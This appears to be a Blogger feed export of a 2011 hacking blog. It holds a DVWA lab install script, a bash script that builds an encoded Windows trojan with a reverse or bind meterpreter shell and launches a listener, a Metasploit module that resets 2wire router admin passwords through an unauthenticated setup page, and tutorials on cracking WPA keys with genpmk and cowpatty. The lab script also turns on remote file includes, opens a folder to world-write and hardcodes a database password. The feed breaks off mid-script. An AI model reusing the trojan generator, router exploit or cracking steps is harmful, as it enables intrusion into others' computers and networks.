type='text'>installDVWA.sh - Script to Download, Configure, and launch Damn Vulnerable Web App on Backtrack 5</title><content type='html'>So I recently need to automate this process as it had to be done on over 30 machines and I'm lazy and if I have more than once it's getting automated. This thing will get DVWA (Damn Vulnerable Web App) download, unzipped, upload in your web root, configured, and start apache and mysql, setup the mysql database with the DVWA data in ~30-45 seconds.&lt;br /&gt;&lt;br /&gt;So first a screenshot of it:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/--JR3X0hJxRs/TlRAvtT4CUI/AAAAAAAAAAg/rquoEG-jtoM/s1600/InstallDVWA%2BScreenshot.png"&gt;&lt;img style="cursor:hand;" src="http://1.bp.blogspot.com/--JR3X0hJxRs/TlRAvtT4CUI/AAAAAAAAAAg/rquoEG-jtoM/s800/InstallDVWA%2BScreenshot.png" alt="ScreenShot of installDVWA.sh" id="BLOGGER_PHOTO_ID_5644207421363063106" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;And of course, you'll probably want the code so here it is. ;-)&lt;br /&gt;==================================================================&lt;br /&gt;#/bin/bash&lt;br /&gt;echo -e "\n#######################################"&lt;br /&gt;echo -e "#          Damn Vulnerable Web App Installer Script               #"&lt;br /&gt;echo -e "#######################################"&lt;br /&gt;echo "    Coded By: Travis Phillips"&lt;br /&gt;echo " Website: http://theunl33t.blogspot.com"&lt;br /&gt;    echo -e -n "\n[*] Changing directory to /var/www..."&lt;br /&gt;    cd /var/www &amp;gt; /dev/null&lt;br /&gt;    echo -e "Done!\n"&lt;br /&gt;&lt;br /&gt;    echo -n "[*] Removing default index.html..."&lt;br /&gt;    rm index.html &amp;gt; /dev/null&lt;br /&gt;    echo -e "Done!\n"&lt;br /&gt;&lt;br /&gt;    echo -n "[*] Changing to Temp Directory..."&lt;br /&gt;    cd /tmp&lt;br /&gt;    echo -e "Done!\n"&lt;br /&gt;&lt;br /&gt;    echo "[*] Downloading DVWA..."&lt;br /&gt;    wget http://voxel.dl.sourceforge.net/project/dvwa/DVWA-1.0.7.zip&lt;br /&gt;    echo -e "Done!\n"&lt;br /&gt;&lt;br /&gt;    echo -n "[*] Unzipping DVWA..."&lt;br /&gt;    unzip DVWA-1.0.7.zip &amp;gt; /dev/null&lt;br /&gt;    echo -e "Done!\n"&lt;br /&gt;&lt;br /&gt;    echo -n "[*] Deleting the zip file..."&lt;br /&gt;    rm DVWA-1.0.7.zip &amp;gt; /dev/null&lt;br /&gt;    echo -e "Done!\n"&lt;br /&gt;&lt;br /&gt;    echo -n "[*] Copying dvwa to root of Web Directory..."&lt;br /&gt;    cp -R dvwa/* /var/www &amp;gt; /dev/null&lt;br /&gt;    echo -e "Done!\n"&lt;br /&gt;&lt;br /&gt;    echo -n "[*] Clearing Temp Directory..."&lt;br /&gt;    rm -R dvwa &amp;gt; /dev/null&lt;br /&gt;    echo -e "Done!\n"&lt;br /&gt;&lt;br /&gt;    echo -n "[*] Enabling Remote include in php.ini..."&lt;br /&gt;    cp /etc/php5/apache2/php.ini /etc/php5/apache2/php.ini1&lt;br /&gt;    sed -e 's/allow_url_include = Off/allow_url_include = On/' /etc/php5/apache2/php.ini1 &amp;gt; /etc/php5/apache2/php.ini&lt;br /&gt;    rm /etc/php5/apache2/php.ini1&lt;br /&gt;    echo -e "Done!\n"&lt;br /&gt;&lt;br /&gt;    echo -n "[*] Enabling write permissions to /var/www/hackable/upload..."&lt;br /&gt;    chmod 777 /var/www/hackable/uploads/&lt;br /&gt;    echo -e "Done!\n"&lt;br /&gt;&lt;br /&gt;    echo -n "[*] Starting Web Service..."&lt;br /&gt;    service apache2 start &amp;amp;&amp;gt; /dev/null&lt;br /&gt;    echo -e "Done!\n"&lt;br /&gt;&lt;br /&gt;    echo -n "[*] Starting MySQL..."&lt;br /&gt;    service mysql start &amp;amp;&amp;gt; /dev/null&lt;br /&gt;    echo -e "Done!\n"&lt;br /&gt;&lt;br /&gt;    echo -n "[*] Updating Config File..."&lt;br /&gt;    cp /var/www/config/config.inc.php /var/www/config/config.inc.php1&lt;br /&gt;    sed -e 's/'\'\''/'\''toor'\''/' /var/www/config/config.inc.php1 &amp;gt; /var/www/config/config.inc.php&lt;br /&gt;    rm /var/www/config/config.inc.php1&lt;br /&gt;    echo -e "Done!\n"&lt;br /&gt;&lt;br /&gt;    echo -n "[*] Updating Database..."&lt;br /&gt;    wget --post-data "create_db=Create / Reset Database" http://127.0.0.1/setup.php &amp;amp;&amp;gt; /dev/null&lt;br /&gt;    mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/gordonb.jpg" where user = "gordonb";'&lt;br /&gt;    mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/smithy.jpg" where user = "smithy";'&lt;br /&gt;    mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/admin.jpg" where user = "admin";'&lt;br /&gt;    mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/pablo.jpg" where user = "pablo";'&lt;br /&gt;    mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/1337.jpg" where user = "1337";'&lt;br /&gt;    echo -e "Done!\n"&lt;br /&gt;&lt;br /&gt;    echo -e -n "[*] Starting Firefox to DVWA\nUserName: admin\nPassword: password"&lt;br /&gt;    firefox http://127.0.0.1/login.php &amp;amp;&amp;gt; /dev/null &amp;amp;&lt;br /&gt;    echo -e "\nDone!\n"&lt;br /&gt;    echo -e "[\033[1;32m*\033[1;37m] DVWA Install Finished!\n"&lt;br /&gt;==================================================================&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7020948317530945898-8581685758863814441?l=theunl33t.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/8581685758863814441'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/8581685758863814441'/><link rel='alternate' type='text/html' href='http://theunl33t.blogspot.com/2011/08/script-to-download-configure-and-launch.html' title='installDVWA.sh - Script to Download, Configure, and launch Damn Vulnerable Web App on Backtrack 5'/><author><name>Travis Phillips</name><uri>http://www.blogger.com/profile/03109495184286865658</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='31' height='23' src='http://3.bp.blogspot.com/-47yG5MEgHcA/TxeD0WkkJxI/AAAAAAAAAEY/LGlRR6bwwpc/s220/33777_454923994603_707019603_5193965_7985624_n1.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/--JR3X0hJxRs/TlRAvtT4CUI/AAAAAAAAAAg/rquoEG-jtoM/s72-c/InstallDVWA%2BScreenshot.png' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-7020948317530945898.post-3492429987453560003</id><published>2011-07-14T15:13:00.007-04:00</published><updated>2011-07-14T16:21:15.802-04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='computers'/><category scheme='http://www.blogger.com/atom/ns#' term='Script'/><category scheme='http://www.blogger.com/atom/ns#' term='IT'/><category scheme='http://www.blogger.com/atom/ns#' term='msfencode'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='metasploit'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><category scheme='http://www.blogger.com/atom/ns#' term='msfpayload'/><category scheme='http://www.blogger.com/atom/ns#' term='backdoor'/><category scheme='http://www.blogger.com/atom/ns#' term='Linux'/><category scheme='http://www.blogger.com/atom/ns#' term='trojan'/><category scheme='http://www.blogger.com/atom/ns#' term='Tips and Tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='BackTrack'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Script to simple using msfpayload &amp; msfencode to create metasploit payload trojans</title><content type='html'>The following is a script I coded to simplify the ease of use for using msfpayload and msfencode to create a windows based trojan and set up the listener. Let's face it, scripting is faster and easier. Also insures it is uniform and automated.&lt;br /&gt;&lt;br /&gt;The script will do the following:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Determine your IP address automatically for the LHOST of the payload.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Ask if you want a shell or meterpreter&lt;/li&gt;&lt;li&gt;Ask if you want it reverse connection or Bind port TCP&lt;/li&gt;&lt;li&gt;Request the Port number.&lt;/li&gt;&lt;li&gt;at that point it will create two files&lt;/li&gt;&lt;li&gt;trojan.exe - your virus payload&lt;/li&gt;&lt;li&gt;msf_Trojan_Listener - a file with a one liner to create the metasploit listener that works with your payload.&lt;/li&gt;&lt;li&gt;Next it will start msfcli to create a listener.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Here is a screenshot of it in action:&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/-PGrNeSd-xR4/Th9LLaUUfhI/AAAAAAAAAAQ/17MN94MNR8M/s1600/001%2Bmsf_trojan_generator.png"&gt;&lt;img style="cursor:hand;" src="http://3.bp.blogspot.com/-PGrNeSd-xR4/Th9LLaUUfhI/AAAAAAAAAAQ/17MN94MNR8M/s600/001%2Bmsf_trojan_generator.png" alt="Screen Shot 1 of msf_trojan_generator" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/-pprLWXgQUgs/Th9LadQfcjI/AAAAAAAAAAY/A3ht-VKdF7k/s1600/002%2Bmsf_trojan_generator.png"&gt;&lt;img style="cursor:hand;" src="http://2.bp.blogspot.com/-pprLWXgQUgs/Th9LadQfcjI/AAAAAAAAAAY/A3ht-VKdF7k/s600/002%2Bmsf_trojan_generator.png" alt="Screen Shot 2 of msf_trojan_generator" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/center&gt;&lt;br /&gt;And of course, you'll probably want the code so here it is. ;-)&lt;br /&gt;==================================================================&lt;br /&gt;#!/bin/bash&lt;br /&gt;ENCODINGTIMES=5&lt;br /&gt;IP=`ifconfig | grep 'inet addr' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{print $1}'`&lt;br /&gt;echo -e "\n#######################################"&lt;br /&gt;echo "#      MSF Trojan Generator v1.0      #"&lt;br /&gt;echo -e "#######################################"&lt;br /&gt;echo "    Coded By: Travis Phillips"&lt;br /&gt;echo " Website: http://theunl33t.blogspot.com"&lt;br /&gt;echo -e "\nYour IP = " $IP&lt;br /&gt;echo -e -n "\n what type of trojan? \n 1) meterpreter \n 2) shell \n\n Which is it: "&lt;br /&gt;read METERORSHELL&lt;br /&gt;echo -e -n "\n What kind of trojan? \n 1) Reverse Connection \n 2) bind_TCP \n\n Which is it: "&lt;br /&gt;read LISTENORREVERSE&lt;br /&gt;echo -e -n "\n What port number are we going to use: "&lt;br /&gt;read PORTNUM&lt;br /&gt;&lt;br /&gt;if [ $LISTENORREVERSE = "1" ]; then&lt;br /&gt;&amp;emsp;LORR='reverse_tcp'&lt;br /&gt;&amp;emsp;LHOST='LHOST='&lt;br /&gt;else&lt;br /&gt;&amp;emsp;LORR='bind_tcp'&lt;br /&gt;&amp;emsp;LHOST=''&lt;br /&gt;&amp;emsp;IP=''&lt;br /&gt;&amp;emsp;echo -e "\n Since you want a bind port\nwhat is the IP of the remote host: "&lt;br /&gt;&amp;emsp;read REMOTEHOST&lt;br /&gt;&amp;emsp;RH='RHOST='&lt;br /&gt;fi&lt;br /&gt;&lt;br /&gt;if [ $METERORSHELL = "1" ]; then&lt;br /&gt;&amp;emsp;SHELLTYPE='meterpreter'&lt;br /&gt;else&lt;br /&gt;  SHELLTYPE='shell'&lt;br /&gt;fi&lt;br /&gt;&lt;br /&gt;echo -e "\n[*] Generating trojan with the following: \n -"$SHELLTYPE"/"$LORR "\n -"$LHOST$IP$RH$REMOTEHOST "\n -PORT=" $PORTNUM&lt;br /&gt;echo -e "\n this can take some time. Please wait...\n"&lt;br /&gt;&lt;br /&gt;msfpayload windows/$SHELLTYPE/$LORR $LHOST$IP LPORT=$PORTNUM R | msfencode -t exe -o ./trojan.exe -c $ENCODINGTIMES&lt;br /&gt;echo -e "\n[*] Done generating `pwd`/trojan.exe! \n"&lt;br /&gt;ls -l trojan.exe&lt;br /&gt;echo -e "\n[*] Now running listener:\n msfcli multi/handler PAYLOAD=windows/"$SHELLTYPE"/"$LORR $LHOST$IP$RH$REMOTEHOST "LPORT="$PORTNUM "E\n\nNOTE: also saving this to `pwd`/msf_Trojan_Listener for a simple cat/paste later."&lt;br /&gt;echo "msfcli multi/handler PAYLOAD=windows/"$SHELLTYPE"/"$LORR $LHOST$IP$RH$REMOTEHOST "LPORT="$PORTNUM "E" &amp;gt; msf_Trojan_Listener&lt;br /&gt;msfcli multi/handler PAYLOAD=windows/$SHELLTYPE/$LORR $LHOST$IP$RH$REMOTEHOST LPORT=$PORTNUM E&lt;br /&gt;&lt;br /&gt;==================================================================&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7020948317530945898-3492429987453560003?l=theunl33t.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/3492429987453560003'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/3492429987453560003'/><link rel='alternate' type='text/html' href='http://theunl33t.blogspot.com/2011/07/script-to-simple-using-msfpayload.html' title='Script to simple using msfpayload &amp; msfencode to create metasploit payload trojans'/><author><name>Travis Phillips</name><uri>http://www.blogger.com/profile/03109495184286865658</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='31' height='23' src='http://3.bp.blogspot.com/-47yG5MEgHcA/TxeD0WkkJxI/AAAAAAAAAEY/LGlRR6bwwpc/s220/33777_454923994603_707019603_5193965_7985624_n1.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-PGrNeSd-xR4/Th9LLaUUfhI/AAAAAAAAAAQ/17MN94MNR8M/s72-c/001%2Bmsf_trojan_generator.png' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-7020948317530945898.post-666345258658774266</id><published>2011-06-22T14:27:00.005-04:00</published><updated>2011-07-14T16:37:40.160-04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Password Reset'/><category scheme='http://www.blogger.com/atom/ns#' term='2wire'/><category scheme='http://www.blogger.com/atom/ns#' term='router'/><category scheme='http://www.blogger.com/atom/ns#' term='Linux'/><category scheme='http://www.blogger.com/atom/ns#' term='Breaking'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='wireless'/><category scheme='http://www.blogger.com/atom/ns#' term='metasploit'/><category scheme='http://www.blogger.com/atom/ns#' term='Cracking'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='module'/><title type='text'>Metasploit module to reset admin password on 2wire wireless routers.</title><content type='html'>&lt;span style="font-weight: bold; color: rgb(255, 0, 0);"&gt;&lt;u&gt;UPDATE&lt;/u&gt;:&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; &lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(255, 0, 0);"&gt;This module is now a part of metasploit. just run msfupdate and it should be under auxiliary/admin/2wire/xslt_password_reset. For details, see &lt;/span&gt;&lt;a style="font-weight: bold; color: rgb(51, 51, 255);" href="http://www.metasploit.com/modules/auxiliary/admin/2wire/xslt_password_reset"&gt;here&lt;/a&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt; &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Here is a metaploit module I coded to reset the password on a 2wire router. It uses a setup wizard page that doesn't verify if the user is authenticated nor remove itself after first time setup. This can be exploited to reset the password. Without further delay, here is the code.&lt;br /&gt;&lt;br /&gt;on my ubuntu box I placed this under /opt/metasploit3/msf3/modules/auxiliary/admin/2wire/2wirepasswordreset.rb&lt;br /&gt;&lt;br /&gt;=====================================================&lt;br /&gt;require 'msf/core'&lt;br /&gt;class Metasploit3 &amp;lt; Msf::Auxiliary&lt;br /&gt;      include Msf::Exploit::Remote::HttpClient&lt;br /&gt;      def initialize&lt;br /&gt;              super(&lt;br /&gt;              'Name'           =&amp;gt; '2Wire Password Reset',&lt;br /&gt;                      'Version'        =&amp;gt; '$Revision: 1 $',&lt;br /&gt;                         'Description' =&amp;gt; %Q{&lt;br /&gt;                   This module will reset the admin password on a 2wire wireless router. This works by using a setup wizard&lt;br /&gt;              page that fails to check if a user is authenicated and doesn't remove or block after first access.&lt;br /&gt;              },&lt;br /&gt;                      'Author'         =&amp;gt; 'Travis Phillips',&lt;br /&gt;                      'License'        =&amp;gt; MSF_LICENSE&lt;br /&gt;              )&lt;br /&gt;      register_options(&lt;br /&gt;          [&lt;br /&gt;              Opt::RPORT(80),&lt;br /&gt;              OptString.new('PASSWORD', [ true, 'What you want the password reset to', 'admin'])&lt;br /&gt;          ], self.class)&lt;br /&gt;&lt;br /&gt;      end&lt;br /&gt;&lt;br /&gt;      def run&lt;br /&gt;      begin&lt;br /&gt;      print_status("Attempting to rest password to #{datastore['PASSWORD']} on #{rhost}\n")&lt;br /&gt;      res = send_request_cgi(&lt;br /&gt;              {&lt;br /&gt;                  'method'  =&amp;gt; 'POST',&lt;br /&gt;                  'uri'     =&amp;gt; '/xslt',&lt;br /&gt;                  'data'    =&amp;gt; 'PAGE=H04_POST&amp;amp;THISPAGE=H04&amp;amp;NEXTPAGE=A01&amp;amp;PASSWORD=' + datastore['PASSWORD'] + '&amp;amp;PASSWORD_CONF=' + datastore['PASSWORD'] + '&amp;amp;HINT=',&lt;br /&gt;              }, 25)&lt;br /&gt;          if (res.code == 200)&lt;br /&gt;              if (res.headers['Set-Cookie'])&lt;br /&gt;                  print_status("Password reset successful!\n")&lt;br /&gt;              end&lt;br /&gt;          end&lt;br /&gt;      end&lt;br /&gt;      end&lt;br /&gt;end&lt;br /&gt;=====================================================&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7020948317530945898-666345258658774266?l=theunl33t.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/666345258658774266'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/666345258658774266'/><link rel='alternate' type='text/html' href='http://theunl33t.blogspot.com/2011/06/metasploit-module-to-reset-admin.html' title='Metasploit module to reset admin password on 2wire wireless routers.'/><author><name>The Unl33t</name><uri>http://www.blogger.com/profile/17211285403285610915</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_mJgRowKkfO8/Sx1rna_mfxI/AAAAAAAAADM/xeeVOgHj1PE/S220/myself.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-7020948317530945898.post-1689897314096066901</id><published>2011-06-18T06:33:00.004-04:00</published><updated>2011-06-18T06:52:23.521-04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='decrypt'/><category scheme='http://www.blogger.com/atom/ns#' term='genpmk'/><category scheme='http://www.blogger.com/atom/ns#' term='WPA2'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='Cracking'/><category scheme='http://www.blogger.com/atom/ns#' term='WPA'/><category scheme='http://www.blogger.com/atom/ns#' term='cryptography'/><category scheme='http://www.blogger.com/atom/ns#' term='cowpatty'/><category scheme='http://www.blogger.com/atom/ns#' term='Linux'/><category scheme='http://www.blogger.com/atom/ns#' term='Rainbow Tables'/><category scheme='http://www.blogger.com/atom/ns#' term='Tips and Tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='encryption'/><category scheme='http://www.blogger.com/atom/ns#' term='Password Recovery'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>How to Generate Rainbow Tables for Cowpatty using genpmk to crack WPA/WPA2</title><content type='html'>Over the past few days I've had people ask me how to generate rainbow tables for Cowpatty. It's quite simple. Just a few things you should know first:&lt;br /&gt;&lt;br /&gt;- Each table is for ONE ESSID. In WPA/WPA2, the SSID of the network is used as a salt to the encryption.&lt;br /&gt;&lt;br /&gt;- You will want to find a good password dictionary file. I recommend the &lt;a href="http://www.renderlab.net/"&gt;Renderlab&lt;/a&gt; &lt;a href="http://www.renderlab.net/projects/WPA-tables/"&gt;church of wifi&lt;/a&gt;'s password list found &lt;a href="http://www.renderlab.net/projects/WPA-tables/9-final-wordlist.zip"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;- Passwords MUST be over 8 characters in length. So if you have a password list, weed out any smaller passwords.&lt;br /&gt;&lt;br /&gt;   And on with the show. Let's first look at the help screen.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;genpmk 1.1 - WPA-PSK precomputation attack. &lt;jwright@hasborg.com&gt;&lt;/jwright@hasborg.com&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;genpmk: Must specify a dictionary file with -f&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Usage: genpmk [options]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;    -f     Dictionary file&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;    -d     Output hash file&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;    -s     Network SSID&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;    -h     Print this help information and exit&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;    -v     Print verbose information (more -v for more verbosity)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;    -V     Print program version and exit&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;After precomputing the hash file, run cowpatty with the -d argument.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;   So, to generate a rainbow table we need to provide a dictionary, an SSID, and a output file for it to write the hashes. so using the above we can do the following&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;genpmk -f final-wordlist.txt -s HackMe -d HackMe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;   This will make it create a Rainbow table called "HackMe" which will contain hashes of all the passwords in the file "final-wordlist.txt" salted with the SSID "HackMe". The output of the shell should update as every 1,000 hashes are created.&lt;br /&gt;&lt;br /&gt;   The whole process isn't actually all that bad for time and the file size for a rainbow table using the password file I suggest is ~40 MB. Not to bad considering the speed boost it will give when you go to crack it.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7020948317530945898-1689897314096066901?l=theunl33t.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/1689897314096066901'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/1689897314096066901'/><link rel='alternate' type='text/html' href='http://theunl33t.blogspot.com/2011/06/how-to-generate-rainbow-tables-for.html' title='How to Generate Rainbow Tables for Cowpatty using genpmk to crack WPA/WPA2'/><author><name>The Unl33t</name><uri>http://www.blogger.com/profile/17211285403285610915</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_mJgRowKkfO8/Sx1rna_mfxI/AAAAAAAAADM/xeeVOgHj1PE/S220/myself.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-7020948317530945898.post-6055952792801595627</id><published>2011-06-18T05:54:00.009-04:00</published><updated>2011-06-23T23:50:09.251-04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='decrypt'/><category scheme='http://www.blogger.com/atom/ns#' term='WPA2'/><category scheme='http://www.blogger.com/atom/ns#' term='installing'/><category scheme='http://www.blogger.com/atom/ns#' term='patch'/><category scheme='http://www.blogger.com/atom/ns#' term='Cracking'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><category scheme='http://www.blogger.com/atom/ns#' term='WPA'/><category scheme='http://www.blogger.com/atom/ns#' term='cowpatty 4.6'/><category scheme='http://www.blogger.com/atom/ns#' term='cryptography'/><category scheme='http://www.blogger.com/atom/ns#' term='cowpatty'/><category scheme='http://www.blogger.com/atom/ns#' term='Linux'/><category scheme='http://www.blogger.com/atom/ns#' term='Tips and Tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Patch, Compile, and Installing coWPAtty 4.6 on Ubuntu</title><content type='html'>Cowpatty is a great tool for cracking WPA/WPA2 keys via either a dictionary attack or via rainbow tables. All it needs to see it a client connect to the network (this is called a "handshake"). However cowpatty isn't perfect and has a problem with reading handshakes incorrectly. After looking into this I found a way to install it with the patch on my Ubuntu box.&lt;br /&gt;&lt;br /&gt;First we need to download the required files. If you already have them you can skip them.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;    sudo apt-get install build-essential&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;    sudo apt-get install libssl-dev&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;    sudo apt-get install libpcap0.8-dev&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;    sudo apt-get install libdigest-hmac-perl&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Next Download cowpatty 4.6&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;   wget http://wirelessdefence.org/Contents/Files/cowpatty-4.6.tgz&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;    md5sum cowpatty-4.6.tgz &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;you should get b90fd36ad987c99e7cc1d2a05a565cbd as the MD5 sum. If so, extract and move into the directory using the following&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;    tar -xvf cowpatty-4.6.tgz&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;    cd cowpatty-4.6&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Next we need to download the patch and patch the source code.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;    wget http://proton.cygnusx-1.org/~edgan/cowpatty/cowpatty-4.6-fixup16.patch&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;    patch &amp;lt; cowpatty-4.6-fixup16.patch&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Next we will compile and install it and then test it&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;    make&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;    sudo make install&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;    cd ..&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;    cowpatty&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;If all goes well you should see the cowpatty help menu:&lt;br /&gt;&lt;br /&gt;cowpatty 4.6 - WPA-PSK dictionary attack. &lt;jwright@hasborg.com&gt;&lt;br /&gt;cowpatty: Must supply a pcap file with -r&lt;br /&gt;&lt;br /&gt;Usage: cowpatty [options]&lt;br /&gt;&lt;br /&gt;  -f     Dictionary file&lt;br /&gt;  -d     Hash file (genpmk)&lt;br /&gt;  -r     Packet capture file&lt;br /&gt;  -s     Network SSID (enclose in quotes if SSID includes spaces)&lt;br /&gt;  -c     Check for valid 4-way frames, does not crack&lt;br /&gt;  -h     Print this help information and exit&lt;br /&gt;  -v     Print verbose information (more -v for more verbosity)&lt;br /&gt;  -V     Print program version and exit&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span&gt;Now if you're as lazy as me. Here's everything together to work as a script&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;#/bin/bash&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;echo -e "\n \e[1;31m[*] Installing build-essential\e[0m"&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;sudo apt-get -y install build-essential&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;echo -e "\n \e[1;34m[*] Installing libssl-dev\e[0m"&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;sudo apt-get -y install libssl-dev &lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;echo -e "\n \e[1;34m[*] Installing libpcap0.8-dev\e[0m"&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;sudo apt-get -y install libpcap0.8-dev &lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;echo -e "\n \e[1;34m[*] Installing libdigest-hmac-perl\e[0m"&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;sudo apt-get -y install libdigest-hmac-perl &lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;echo -e "\n \e[1;34m[*] Downloading cowpatty-4.6.tgz\e[0m"&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;wget http://wirelessdefence.org/Contents/Files/cowpatty-4.6.tgz &lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;md5sum cowpatty-4.6.tgz &lt;/span&gt;&lt;br /&gt;&lt;span 